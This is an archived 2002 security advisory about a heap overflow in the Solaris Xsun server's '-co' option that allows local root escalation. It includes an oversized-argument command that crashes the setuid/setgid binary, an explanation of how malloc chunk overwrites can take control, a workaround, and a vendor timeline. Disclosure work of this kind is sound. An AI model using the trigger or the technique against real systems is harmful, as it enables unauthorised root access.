what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

nsfocus.xsun.txt

nsfocus.xsun.txt
Posted Apr 6, 2002
Site nsfocus.com

Nsfocus Security Advisory SA2002-02 - Xsun, shipped with Solaris 2.6, 2.7, and 2.8 contains a local root vulnerability due to a heap overflow in the -co options.

tags | overflow, local, root
systems | solaris
SHA-256 | 9a9428ce3911c3d59d9fde72d6b4397689a63f2c48c66f093fe01f89085e2157

nsfocus.xsun.txt

Change Mirror Download
NSFOCUS Security Advisory(SA2002-01)

Topic: Sun Solaris Xsun "-co" heap overflow

Release Date: 2002-4-02

CVE CAN ID : CAN-2002-0158

Affected system:
================

- Sun Solaris 2.6 (SPARC/x86)
- Sun Solaris 7 (SPARC/x86)
- Sun Solaris 8 (SPARC/x86)

Impact:
=========

NSFOCUS Security Team has found a buffer overflow vulnerability in Xsun shiped
with Solaris system when processing a command line parameter "-co", which could
enable a local attacker to run arbitrary code with root user/root group
privilege.

Description:
============

Xsun is an Xwindow server (for X11) on Solaris platform. It is installed in
/usr/openwin/bin/. On SPARC platform, it is configured to have setgid root
attribute, and it is configured to have setuid root attribute on x86 platform.

Xsun supports a command line parameter "-co" to specify color database file.
But the application does not perform length check of filename inputted by user,
which would be used by an attacker to cause heap overflow. With carefully
constructed data, an attacker might be able to run arbitrary code with root
privilege.

In case that the attacker provide an overlong filename (for example, longer
than 6000 bytes) for the "-co", it would overflow a dynamic allocated buffer.
The attacker could modify arbitrary memory address (such as saved return
address, and function pointer, etc.) with some features of malloc()/free()
implementation by overwriting the border data structure of the next
dynamic memory chunk.

On SPARC platform, attacker could obtain root group privilege; on x86
platform, attacker could obtain root user privilege.


Exploit:
==========

[root@ /tmp]> uname -a
SunOS sun8 5.8 Generic sun4u sparc SUNW,Ultra-5_10
[root@ /tmp]> truss /usr/openwin/bin/Xsun :1 -co `perl -e 'print "A"x6000'`
.....
mmap(0x00000000, 8404992, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_NORESERVE, 4, 0) = 0xFE400000
mprotect(0xFE400000, 8192, PROT_NONE) = 0
mprotect(0xFEC02000, 8192, PROT_NONE) = 0
open64("A...AAAAA", O_RDONLY) Err#78 ENAMETOOLONG
Couldn't open RGB_DB 'write(2, " C o u l d n ' t o p e".., 22) = 22
AAA...AAAAAAAAAAAAAAAAAAAAAAAAAAwrite(2, " A A A A A A A A A A A A".., 6000) = 6000
'
write(2, " '\n", 2) = 2
getpid() = 21677 [21676]
getrlimit(RLIMIT_NOFILE, 0xFFBEE3F8) = 0
setrlimit(RLIMIT_NOFILE, 0xFFBEE3F8) = 0
uname(0xFFBEDB30) = 1
getrlimit(RLIMIT_NOFILE, 0xFFBEE128) = 0
so_socket(2, 2, 0, "", 1) = 0
setsockopt(0, 6, 1, 0xFFBEE124, 4, 1) = 0
setsockopt(0, 65535, 8, 0xFFBEE120, 4, 1) = 0
setsockopt(0, 65535, 4, 0xFFBEE194, 4, 1) = 0
bind(0, 0xFFBEE1B8, 16, 3) = 0
setsockopt(0, 65535, 128, 0x00175D40, 8, 1) = 0
listen(0, 5, 1) = 0
getsockname(0, 0xFFBEE144, 0xFFBEE154, 1) = 0
uname(0xFFBEDB30) = 1
Incurred fault #5, FLTACCESS %pc = 0xFECC14C8
siginfo: SIGBUS BUS_ADRALN addr=0x41414141
Received signal #10, SIGBUS [default]
siginfo: SIGBUS BUS_ADRALN addr=0x41414141
*** process killed ***

Workaround:
===================

Temporarily remove the suid root or sgid root attribute of Xsun:

# chmod a-s /usr/openwin/bin/Xsun


Vendor Status:
==============

2001.8.08 We have informed Sun of this problem.
2001.8.08 Sun replied that they have forward the problem to corresponding
team, but no further response up to now.

In our testing, Xsun with the latest security patch still has the problem.

Additional Information:
========================

The Common Vulnerabilities and Exposures (CVE) project has
assigned the name CAN-2002-0158 to this issue. This is a
candidate for inclusion in the CVE list (http://cve.mitre.org),
which standardizes names for security problems. Candidates
may change significantly before they become official CVE entries.

DISCLAIMS:
==========
THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY
OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED,
EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENTSHALL NSFOCUS
BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL,CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES,
EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
DISTRIBUTION OR REPRODUTION OF THE INFORMATION IS PROVIDED THAT THE
ADVISORY IS NOT MODIFIED IN ANY WAY.

Copyright 1999-2002 NSFOCUS. All Rights Reserved. Terms of use.


NSFOCUS Security Team <security@nsfocus.com>
NSFOCUS INFORMATION TECHNOLOGY CO.,LTD
(http://www.nsfocus.com)



Login or Register to add favorites

File Archive:

February 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    11 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    5 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    0 Files
  • 6
    Feb 6th
    9 Files
  • 7
    Feb 7th
    33 Files
  • 8
    Feb 8th
    34 Files
  • 9
    Feb 9th
    0 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    0 Files
  • 13
    Feb 13th
    0 Files
  • 14
    Feb 14th
    0 Files
  • 15
    Feb 15th
    0 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close